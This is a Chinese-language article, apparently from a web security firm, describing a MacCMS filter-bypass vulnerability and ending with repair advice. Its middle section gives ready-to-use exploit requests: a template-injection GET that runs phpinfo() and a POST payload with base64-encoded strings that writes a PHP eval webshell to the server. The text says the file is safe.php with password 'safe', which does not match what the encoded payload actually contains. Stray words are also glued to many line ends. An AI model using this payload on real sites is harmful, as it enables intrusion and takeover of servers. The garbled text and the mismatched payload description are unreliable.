蘋果cms網站漏洞修復解決辦法

蘋果cms系統,是目前不少電影網站都在使用的一套網站系統,開源,免費,擴展性較好,支持一鍵採集,僞靜態化,高併發的同時承載,得到的不少站長的喜歡,於近日被網站安全檢測發現,maccms存在網站漏洞,sql注入盲射獲取數據庫的管理員帳號密碼,關於該漏洞的詳情,咱們仔細分析看下.php

maccms漏洞分析與修復mysql

蘋果CMS採用的是php語言開發的代碼,使用的數據庫是mysql類型,這種架構是比較經常使用的,也是比較穩定的,可是在安全方面出現的問題是比較多的,此次發現的是sql注入漏洞,在網站的根目錄下的inc文件裏的module目錄下的vod.php代碼以下圖所示:web

代碼裏的empty($wd函數,在進行判斷若是是,或者不是的邏輯過程中,會將前段用戶訪問帶來的參數,進行安全過濾,咱們跟進代碼來追尋到蘋果CMS的配置文件,在function.php配置文件代碼李看到對網站的全部請求方式包括get、post、cookies的提交方式都強制性的進行了安全轉義。網站漏洞問題的發生就在這裏.sql

咱們仔細又發現,maccms使用了360安全提供的防止sql注入攔截代碼。360的防止sql注入是好幾年前開發,並公開在網絡上的,已經好久沒有更新維護了而且還存在sql注入代碼繞過的狀況,參數值之間進行實體轉換的時候,360的sql攔截規則沒有對空白符以及反斜槓進行攔截,致使能夠繞過插入惡意參數,直接請求到蘋果cms後端數據庫中去,獲取蘋果CMS的管理員帳號密碼。shell

咱們來看下如何利用蘋果CMS的漏洞,從上面漏洞發生的細節裏能夠看出,是由於攔截sql注入語句的過程當中存在能夠被繞過的漏洞。咱們來使用%0b,以及空格對代碼進行注入,sql語句在拼接中,能夠插入反斜槓進行單引號的報錯,從而繞過蘋果CMS的安全攔截。語句以下:數據庫

GET請求:後端

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}安全

能夠直接看php的具體信息cookie

POST請求網絡

能夠直接獲取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST內容以下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

能夠直接生成帶有一句話木馬後門的代碼,文件名爲safe.php,一句話木馬連接密碼是safe.

如何修復蘋果cms網站漏洞呢?

對網站漏洞的修復咱們要知道漏洞產生的緣由,以及爲什麼會繞過蘋果CMS的安全過濾,maccms使用的addslash安全函數,sql中沒有加單引號的安全防禦,in字句也很容易忘記加引號,再一個後期處理安全過濾的時候能夠插入單引號,stripslash致使能夠加入單引號,編解碼致使繞過addslash,使用urldecode編碼進行注入繞過,根據上面提出的漏洞繞過,咱們SINE安全提出漏洞修復的建議是:對URL解碼進行雙層的轉義,對get,post,cookies的攔截規則進行安全更新,增強空格,以及百分符號的攔截,若是對程序代碼不熟悉的話建議諮詢專業的網站安全公司來處理解決。

相關文章
相關標籤/搜索